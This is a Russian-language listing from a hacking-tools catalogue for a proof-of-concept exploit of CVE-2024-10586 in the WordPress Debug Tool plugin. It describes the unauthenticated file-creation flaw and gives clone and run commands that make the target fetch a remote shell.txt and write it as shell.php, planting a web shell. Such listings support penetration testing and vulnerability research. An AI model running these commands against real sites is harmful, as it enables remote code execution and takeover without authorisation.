Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-10586-Poc — Эксплойт proof-of-concept для CVE-2024-10586, нацеленный на плагин WordPress Debug Tool. Автоматизирует произвольную загрузку файлов, приводящую к удалённому выполнению кода через неаутентифицированные POST-запросы. | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2024-10586-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2024-10586-poc

CVE-2024-10586-Poc

Эксплойт proof-of-concept для CVE-2024-10586, нацеленный на плагин WordPress Debug Tool. Автоматизирует произвольную загрузку файлов, приводящую к удалённому выполнению кода через неаутентифицированные POST-запросы.

Репозиторий
101 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Информация об уязвимости

Описание Плагин Debug Tool для WordPress уязвим к произвольному созданию файлов из-за отсутствия проверки прав доступа в функции dbt_pull_image() и отсутствия проверки типа файла во всех версиях до 2.2 включительно.
Это позволяет неаутентифицированным злоумышленникам создавать произвольные файлы, такие как .php файлы, которые могут быть использованы для удалённого выполнения кода.

ID CVE

CVE-2024-10586

Использование скрипта

Предварительные требования

  • Python 3.x установлен в вашей системе.
  • Установите необходимые зависимости: pip install requests

Как запустить

  1. Клонируйте репозиторий с GitHub:
root@kitploit:~
git clone https://github.com/Nxploited/CVE-2024-10586-Poc
cd CVE-2024-10586-Poc
  1. Запустите скрипт следующей командой: python CVE-2024-10586.py -u -r -p

    Параметры

  • -u, --url: Базовый URL сайта WordPress (например, http://example.com/wordpress).
  • -r, --remote: URL удалённого файла, который будет использоваться как источник полезной нагрузки.
  • -p, --path: Необязательный. Путь, по которому будет сохранена оболочка. По умолчанию: /opt/lampp/htdocs/wordpress/wp-content/Nxploit.php.

Пример команды

root@kitploit:~
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php

Пример использования

root@kitploit:~
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php

usage: CVE-2024-10586.py [-h] -u URL -r REMOTE [-p PATH]

Send a POST request to WordPress admin-ajax.php.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     The base URL of the WordPress site.
  -r REMOTE, --remote REMOTE
                        The remote URL to use in the 'source' parameter.
  -p PATH, --path PATH  The file path to use in the 'missed' parameter. Defaults to '/opt/lampp/htdocs/wordpress/wp-content/Nxploit.php'.

Отказ от ответственности

Этот скрипт предназначен только для образовательных целей. Используйте его ответственно и только на тех системах, которыми вы владеете или на тестирование которых у вас есть явное разрешение. Авторы не несут ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.

Скачать инструмент